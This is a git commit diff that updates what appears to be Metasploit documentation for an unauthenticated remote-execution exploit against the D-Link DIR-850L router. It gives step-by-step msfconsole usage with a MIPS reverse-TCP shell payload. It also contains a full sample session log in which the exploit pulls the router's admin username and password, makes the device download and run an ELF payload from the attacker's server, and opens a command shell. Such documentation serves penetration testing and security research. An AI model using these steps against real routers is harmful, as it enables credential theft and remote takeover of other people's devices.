update doc

Austin · web-flow · commit 646c7f7c0a52 · 2017-11-04T11:40:32.000-04:00
diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md
@@ -8,7 +8,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing
   1. Start msfconsole
   2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
   3. Do : `set RHOST [RouterIP]`
-  4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp`
+  4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp`
   5. Do : `run`
   6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
 
@@ -17,59 +17,48 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing
 
 ```
 msf > use exploit/linux/http/dlink_dir850l_unauth_exec
-msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
+msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
 RHOST => 192.168.0.14
-msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
+msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
 RPORT => 80
-msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
+msf exploit(dlink_dir850l_unauth_exec) > check
+[*] 192.168.0.14:80 The target service is running, but could not be validated.
+msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
+VERBOSE => true
+msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
 LHOST => ens3
-msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
-LPORT => 1351
-msf exploit(dlink_850l_unauthenticated_exec) > run
-[*] Exploit running as background job 0.
+msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
+LPORT => 3131
+msf exploit(dlink_dir850l_unauth_exec) > run
 
-[*] Started reverse TCP handler on 192.168.0.11:1351
-msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO
-[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO
-[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO
-[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO
+[*] Started reverse TCP handler on 192.168.0.11:3131
+[*] 192.168.0.14:80 - Connecting to target...
+[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
+[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
+[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
+[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
+[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
+[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
 [*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
 [*] 192.168.0.14:80 - Sending payload to the server...
-[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO
-[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO
-[*] 192.168.0.14:80 - Waiting for shell to connect back to us...
+[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
+[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
+[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
 [*] Sending stage (84 bytes) to 192.168.0.14
-[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400
-[+] Deleted /tmp/dhufstzw
-sessions -i 1
+[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
+[+] Deleted /tmp/uoskutcy
+[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
+[*] Server stopped.
+[*] Exploit completed, but no session was created.
+msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
 [*] Starting interaction with 1...
 
-3353690789
-yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC
+190745749
+wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
 true
-MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA
-mMzxldJdkNYWlIrHrOazzOcpCRTuRipt
-OayNFBMDfTSaJIFwpNPoWErXCvLmIguK
-[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
-[*] Server stopped.
+pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
+OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
+iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
 pwd
 /
-ls
-www
-var
-usr
-tmp
-sys
-sbin
-proc
-mydlink
-mnt
-lib
-include
-htdocs
-home
-etc
-dev
-bin
-
 ```
